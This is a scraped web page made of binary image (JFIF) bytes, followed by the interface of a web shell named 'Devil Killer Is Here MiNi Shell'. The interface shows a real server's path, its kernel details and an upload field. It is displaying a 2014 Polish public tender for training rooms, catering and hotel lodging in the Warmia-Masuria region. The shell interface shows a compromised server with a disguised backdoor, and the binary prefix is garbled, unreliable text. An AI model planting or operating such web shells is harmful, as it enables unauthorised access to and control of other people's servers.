JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141219/415674-N-2014.html

<p class="kh_header"><b>Olsztyn: Przedmiotem zamówienia jest usługa: Wynajem sal szkoleniowych, zapew-nienie cateringu oraz noclegów dla uczestników projektu Ekologiczny biznes to dobry biznes</b><br>
<b>Numer ogłoszenia: 415674 - 2014; data zamieszczenia: 19.12.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Warmińsko-Mazurska Agencja Rozwoju Regionalnego S.A. w Olsztynie , Plac Generała Józefa Bema 3, 10-516 Olsztyn, woj. warmińsko-mazurskie, tel. 89 5211250, 5211286, faks 89 5211260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wmarr.olsztyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa: Wynajem sal szkoleniowych, zapew-nienie cateringu oraz noclegów dla uczestników projektu Ekologiczny biznes to dobry biznes.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa: Wynajem sal szkoleniowych, zapewnienie cateringu oraz noclegów dla uczestników projektu Ekologiczny biznes to dobry biznes.
Usługa obejmuje: wynajem sal szkoleniowych, pokoi hotelowych wraz ze śniadaniem, zapewnienie pełnego wyżywienia w przypadku szkoleń wyjazdowych i serwisów kawowych oraz wyżywienia wraz z serwisem kawowym w przypadku szkoleń stacjonarnych dla uczestników projektu i trenerów podczas szkoleń organizowanych w ramach projektu pn.: Ekologiczny biznes to dobry biznes.

3.1. Wykonawca zobowiązuje się do zapewnienia;
- sal szkoleniowych na czas szkoleń - łącznie 544 godziny zegarowe (68 dni) 
- 1-osobowych pokoi hotelowych wraz z łazienką oraz śniadaniem (łącznie 217 noclegów)
- zapewnienie wyżywienia obsługi cateringowej podczas zajęć dla uczestników szkoleń stacjonarnych i wyjazdowych oraz trenerów - łącznie 868 jednostek cateringowych - w ciągu 68 dni szkoleniowych.

3.1.1. Szkolenia stacjonarne 2-dniowe:
szkolenia stacjonarne odbywać się będą w miastach powiatowych województwa warmińsko - mazurskiego w obiektach szkoleniowo-konferencyjny lub obiektach hotelowych tj. Lidzbark Warmiński, Elbląg, Ełk, Giżycko, Węgorzewo, Ostróda, Mrągowo, Olecko, Olsztyn, Szczytno, Kętrzyn z parkingiem bezpłatnym samochodowy dla uczestników szkolenia, w miejscu dobrze skomunikowanym i dostępnym dla osób bez samochodów.
Wykonawca zapewni;
sale szkoleniowe wraz z wyposażeniem dla 17 grup (ok.7-17 osób+trener) - 34 dni
wyżywienie dla uczestników szkoleń oraz trenera - osobodzień - 434 jednostek caterin-gowych (obiad, serwis kawowy ciągły).

3.1.2. Szkolenia wyjazdowe 2-dniowe. 
szkolenia wyjazdowe odbywać się będą w obiektach hotelowych o standardzie min 3* na terenie województwa warmińsko - mazurskiego w: Elblągu, Olsztynie i Ełku tj. w miejscu zakwaterowania uczestników projektu, z parkingiem bez-płatnym samochodowym dla uczestników szkolenia, w miejscu dobrze skomu-nikowanym i dostępnym dla osób bez samochodów.
3.1.3. Zamówienie należy wykonać zgodnie z wymogami określonymi poniżej: 
1) Liczba uczestników: maksymalnie 217 osób; w tym 17 grup szkoleniowych (ok.7-17 osób) i 17 trenerów (możliwość prowadzenia 2 grup jednocześnie w ww. lokalizacjach województwa warmińsko-mazurskiego )
2) Termin realizacji zamówienia: od dnia podpisania umowy do 15.05.2015 r.
3) Czas trwania szkolenia - 2 dni, rozpoczęcie (przyjazd) ok. godziny 09.00 dnia pierw-szego, zakończenie (wyjazd)- godzina 16.00 dnia drugiego. 
4)Miejsce organizacji szkolenia: 
a) szkolenia stacjonarne - obiekt szkoleniowo-konferencyjny lub obiekt hotelowy
b) szkolenia wyjazdowe: obiekt hotelowy o standardzie min 3 *
5) Standard miejsca realizacji szkolenia wyjazdowego: Wykonawca zapewni realizację usług w obiekcie szkoleniowo-hotelowym z zapleczem noclegowo-restauracyjnym, po-siadającym przyznaną kategorię co najmniej trzygwiazdkową (zgodnie z kategoryzacją obiektów konferencyjno-hotelowych/hoteli uzyskaną zgodnie z wymaganiami ustawy z 29 sierpnia z 1997 r. oraz rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r. Nr 22, poz. 169 z późn. zm.). 
6) Wykonawca zobligowany jest do świadczenia usług hotelarskiej, gastronomicznej i szkoleniowej w tym samym obiekcie szkoleniowo-hotelowym (budynku). 
UWAGA: 
1.	w przypadku otrzymania przez Wykonawcę informacji o przybyciu mniejszej niż przewidziana ilości uczestników szkolenia (ale nie mniej niż 20%) lub nieskorzystaniu przez nich z noclegu zobowiązuje się on do proporcjo-nalnego obniżenia ceny zakwaterowania w stosunku do ceny podstawowej, w oparciu o faktyczną ilość uczestników; 
2.	Zamawiający nie pokrywa kosztów zakwaterowania ani wyżywienia osób towarzyszących uczestnikom szkolenia; 
3.	Zamawiający nie pokrywa kosztów krajowych i zagranicznych rozmów te-lefonicznych wykonywanych z pokoi hotelowych przez osoby zakwatero-wane; 
4.	Zamawiający nie pokrywa kosztów związanych z udostępnieniem w poko-jach mini-baru, płatnej tv itp.; 
5.	wyżej wymienione i inne koszty, które nie są związane z wykonywaniem przedmiotu zamówienia i warunkami stawianymi przez Zamawiającego, zostaną opłacone indywidualnie przez osoby zakwaterowane. 
7) Sala szkoleniowa: 
a) Wykonawca zobligowany jest do zapewnienia klimatyzowanej sali szkoleniowej dla 7-17 uczestników + trener, wyposażonej w ekran, rzutnik multimedialny, laptop, tablicę typu flipchart, nagłośnienie, z bezprzewodowym i przewodowym dostępem do Internetu wraz z obsługą wyposażenia.
8) Zapewnienie miejsc noclegowych ze śniadaniem dla 217 osób, w tym: 217 pokoi jed-noosobowych (możliwość prowadzenia 2 grup jednocześnie w ww. lokalizacjach woje-wództwa warmińsko-mazurskiego).
9) Zapewnienie całodziennego wyżywienia dla uczestników i trenera - osobodzień - 434 jednostek cateringowych (obiad, serwis kawowy ciągły, kolacja) 
10) Parking: Wykonawca zobowiązany jest do nieodpłatnego udostępnienia miejsc par-kingowych dla uczestników szkoleń (w bezpośrednim sąsiedztwie obiektu szkoleniowo-hotelowego).  
Wykonawca otrzyma informację dotyczącą ostatecznej ilości uczestników korzystających z miejsc noclegowych najpóźniej na 3 dni przed rozpoczęciem danego szkolenia. 
Zamawiający dopuszcza możliwość organizacji jednocześnie 2 szkoleń w tym samym terminie w dwóch różnych lokalizacjach w woj. warmińsko-mazurskiego.

Rozliczenie odbywać się będzie na podstawie faktycznie wykonanego zakresu umowy i ustalonej ceny jednostkowej.

3.1.4. Zakres przedmiotu zamówienia:
Niezbędne wymagania odnośnie sali szkoleniowej (szkolenia stacjonarne i wyjazdowe) dla ok. 7-17 uczestników szkoleń i trenera:
a)	powinna znajdować się na terenie miasta powiatowego województwa warmińsko-mazurskiego, w przypadku szkoleń wyjazdowych w miejscu zakwaterowania (na te-renie Elbląga, Olsztyna, Ełku) z parkingiem samochodowym bezpłatnym dla uczest-ników szkolenia, w miejscu dobrze skomunikowanym i dostępnym dla osób bez sa-mochodów; 
b)	powinna posiadać powierzchnię nie mniejszą niż 70 m2 gwarantując tym samym op-tymalne warunki prowadzenia zajęć szkoleniowych w grupie ok. 17-osobowej + trener
c)	powinna być wyposażona w stoły oraz krzesła, tablicę sucho ścieralną i tablicę typu flipchart z zapasem kartek, mazaków, komputer/laptop, rzutnik multimedialny, ekran;
d)	ustawienie stołów i krzeseł w podkowę lub teatralne z możliwością podania serwisu kawowego w sali lub w jej bliskim sąsiedztwie; 
e)	sala powinna gwarantować optymalne warunki prowadzenia zajęć szkoleniowych w grupach ok. 7-17 osobowych + trener, czyli pomieszczenie z zapewnionym zaple-czem do przeprowadzenia szkolenia, tj. spełniać odpowiednie warunki sanitarne, bezpieczeństwa, akustyczne i jakościowe z dostępem do toalet na tym samym pię-trze co sala szkoleniowa; 
f)	pozwala zapewnić odpowiednie oświetlenie: dostęp światła dziennego oraz całodobowe oświetlenie umożliwiające swobodne i bezpieczne dla wzroku czytanie, a zarazem możliwość zaciemnienia sali podczas prezentacji multimedialnej; 
g)	powinna posiadać klimatyzację i ogrzewanie i być odpowiednio przygotowana w zależności od panujących na zewnątrz warunków atmosferycznych;
h)	musi być dostępna w godzinach 8:00-17:00- na minimum 8 godzin w dni robocze (od poniedziałku do piątku), 
i)	powinna być dostosowana do potrzeb osób niepełnosprawnych (w tym poruszających się na wózkach inwalidzkich);
j)	powinna być w trakcie czasu trwania szkoleń oznakowana zgodnie z przekazanymi przez Zamawiającego materiałami o wizualizacji zgodnej z wymogami Projektu; 
k)	jest odrębnym pomieszczeniem od pomieszczenia, w którym spożywane są posiłki.
Podczas szkolenia sala konferencyjna będzie dostępna dla Zamawiającego wraz z obsługą techniczną.

3.1.5. Niezbędne wymagania dotyczące wyżywienia - szkolenie stacjonarne 2-dniowe: 
Do Wykonawcy należy zapewnienie usługi wyżywienia i usługi cateringowej dla ok. 200 uczestników szkoleń i 17 trenerów (szkolenie odbywa się w ciągu dwóch nastę-pujących po sobie dni roboczych).
W trakcie dnia szkoleniowego Wykonawca zapewni uczestnikom szkoleń serwis ka-wowy ciągły, na który składać się będą: gorąca kawa, gorąca herbata, cukier, śmie-tanka, cytryna, woda mineralna gazowana i niegazowana, soki, świeże ciastka róż-nego rodzaju, owoce oraz zestaw obiadowy z napojami.  
W skład zestawu obiadowego powinno wchodzić:
zupa lub zimne przekąski, 1 danie główne na ciepło , deser oraz napoje; 
Wykonawca powinien zapewnić menu mięsne i wegetariańskie oraz zapewnić różnorodność posiłków; 
Wszystkie posiłki oraz serwis kawowy muszą być wydawane na zastawie wielorazowego użytku; 
Posiłek (obiad/lunch) powinien być serwowany poza salą szkoleniową (w jej bliskim sąsiedztwie) w którym uczestnicy mogą spożyć serwowany ciepły posiłek (zagwarantowane miejsca siedzące dla ok. 17 osób + trener.

Szkolenia stacjonarne:
Miasta powiatowe - szkolenia stacjo-narne-dwudniowe	Ilość godzin/dni szkoleń w okresie od dnia podpisania umowy do 15.05.2015
Usługa wynajmu sal szkoleniowych 
(17 grup szkoleniowych x 2 dni)	272h/34dni
Usługa obiadowa + serwis kawowy ciągły x 2 dni	434 jednostki cateringowe

3.1.6. Niezbędne wymagania dotyczące wyżywienia - szkolenie wyjazdowe 2-dniowe: 
Do Wykonawcy należy zapewnienie usługi noclegu, wyżywienia i usługi cateringowej dla ok. 200 uczestników szkoleń i 17 trenerów (szkolenie odbywa się w ciągu dwóch następujących po sobie dni roboczych). 
W trakcie dnia szkoleniowego Wykonawca zapewni uczestnikom szkoleń serwis kawowy ciągły, na który składać się będą: gorąca kawa, gorąca herbata, cukier, śmietanka, cytryna, woda mineralna gazowana i niegazowana, soki, świeże ciastka różnego rodzaju, owoce oraz zestaw obiadowy z napojami.
W skład zestawu obiadowego powinno wchodzić:
zupa lub zimne przekąski, 1 danie główne na ciepło , deser oraz napoje; 
Wykonawca powinien zapewnić menu mięsne i wegetariańskie oraz zapewnić różnorodność posiłków; 
Wszystkie posiłki oraz serwis kawowy muszą być wydawane na zastawie wielorazowego użytku; 
Posiłek (obiad/lunch) powinien być serwowany poza salą szkoleniową (w jej bliskim sąsiedztwie) w którym uczestnicy mogą spożyć serwowany ciepły  z gwarancją miejsc siedzących.
W skład kolacji powinno wchodzić:
zimne przekąski, 1 danie główne na ciepło , deser oraz napoje; 
Wykonawca powinien zapewnić menu mięsne i wegetariańskie oraz zapewnić róż-norodność posiłków; 
UWAGA: w przypadku otrzymania przez Wykonawcę informacji o przybyciu mniejszej ilości uczestników szkolenia niż przewidziana (ale nie mniej niż 20%) lub nieskorzystaniu przez nich z wyżywienia, zobowiązuje się on do proporcjo-nalnego obniżenia ceny usługi gastronomicznej w stosunku do ceny podstawowej, w oparciu o faktyczną ilość uczestników.

3.1.7. Niezbędne wymagania dotyczące noclegu - szkolenie wyjazdowe: 
Wykonawca zapewni nocleg w okresie pomiędzy od dnia podpisania umowy do 15.05.2015, łącznie przez 34 dni dla 200 uczestników projektu i 17 trenerów w hotelu minimum trzy gwiazdkowym w pokojach jednoosobowych z łazienką. 
Wykonawca zapewni śniadanie w cenie noclegu,
Wykonawca zapewni ubezpieczenie NNW dla uczestników szkolenia od pierwszego do ostatniego dnia szkolenia.
Szczegółowe terminy prowadzenia szkoleń zostaną uzgodnione z Wykonawcą najpóźniej 7 dni przed rozpoczęciem szkolenia. 
Szkolenia wyjazdowe:
ELBLĄG/OLSZTYN/EŁK-szkolenia wyjazdowe- dwudniowe	Ilość godzin/dni szkoleń w okresie od dnia podpisania umowy do 15.05.2015
Usługa wynajmu sal szkoleniowych 
(17 grup szkoleniowych x 2 dni)	272h/34dni
Usługa noclegu ze śniadaniem	217 osób/1 nocleg
Usługa całodobowego wyżywienia 
(2 x obiad +1x kolacja)+ 2 x serwis kawowy ciągły	434 jednostki

Termin realizacji szkoleń: szkolenia obywać się będą w grupach ok. 7-17 osobowych + trener, w okresie od dnia podpisania umowy do 15.05.2015 r. w dni robocze w godzinach 8:00-17:00. Szczegółowe terminy prowadzenia szkoleń zostaną uzgodnione z Wykonawcą najpóźniej 7 dni przed rozpoczęciem szkolenia. 
Zamawiający w trosce o należyte wykonanie szkoleń zastrzega sobie prawo do wizji lokalnej zaoferowanych przez Wykonawcę w ofercie sal szkoleniowo-wykładowych, celem sprawdzenia w/w wymogów. W razie zamiaru dokonania takiej wizji Wykonawca ma obowiązek umożliwienia Zamawiającemu dokonania takiej wizji. W razie uniemożliwienia sprawdzenia Zamawiającemu jakości sal oferta Wykonawcy ulega odrzuceniu.
Wykonawcy za wykonanie czynności przysługuje wynagrodzenie stanowiące:
a)	W przypadku usługi wynajęcia pokoi hotelowych: iloczyn liczby wynajętych pokoi hotelowych i stawki za nocleg w pokoju jednoosobowym z łazienką w hotelu o standardzie min. trzy gwiazdkowym 
b)	W przypadku wynajmu sal szkoleniowych: iloczyn dni za wynajem sali szkoleniowej i stawki za wynajem.
c)	W przypadku wyżywienia i przerw kawowych: iloczyn ilości zrealizowanych usług oraz stawki za jedną jednostkę cateringową.
Szczegółowy opis przedmiotu zamówienia znajduje się w SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających w trybie z wolnej ręki, których wartość nie przekroczy 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt. 6 ustawy. polegających na powtórzeniu tego samego rodzaju zamówienia opisanego w pkt 3 SIWZ</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.30.00.00-3, 55.00.00.00-0, 55.10.00.00-1, 55.12.00.00-7, 55.13.00.00-0, 55.11.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży oświadczenie na podstawie art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełni Wykonawca, który wykaże że w okresie ostatnich trzech lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał należycie co najmniej 2 usługi obejmujące swoim zakresem usługę wynajmu sal szkoleniowych, zapewnienie cateringu oraz noclegów dla uczestników konferencji, szkolenia lub przedsięwzięcia o podobnym charakterze, o łącznej wartości nie mniejszej niż 50.000 zł brutto każda. 

INFORMACJA O POSIADANIU WIEDZY I DOŚWIADCZENIA (wykaz wykonywanych usług) wg. załącznika nr 4.
Do wykazu należy dołączyć dokumenty potwierdzające, że usługi zostały wyko-nane lub są wykonywane należycie.
Potwierdzeniem spełnienia tego warunku, będzie wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia dzia-łalności jest krótszy - w tym okresie, wraz z podaniem nazwy i adresu zamawiającego, miejsca i zakresu wykonania usługi, czasu realizacji i wartości wykonanych usług oraz dowody, czy zostały wykonane lub są wykonywane należycie. Dowodami, o których mowa w zdaniu poprzedzającym są:
a)	Poświadczenie odbiorcy usługi, z tym, że w odniesieniu do nadal wykonywa-nych usług okresowych lub ciągłych, poświadczenie to powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub
b)	Oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa w pkt. a;
W przypadku, gdy podmiotem, na rzecz którego wykonano usługi wskazanej przez Wykonawcę w wykazie, o którym mowa wyżej, jest Warmińsko - Mazurska Agencja Rozwoju Regionalnego S.A., Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa w pkt a i b</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży oświadczenie zgodnie z treścią pkt 8 i 9 formularza ofertowego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży oświadczenie na podstawie art. 22 ustawy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca złoży oświadczenie na podstawie art. 22 ustawy.

Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wymienionych w pkt. 9.1 Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

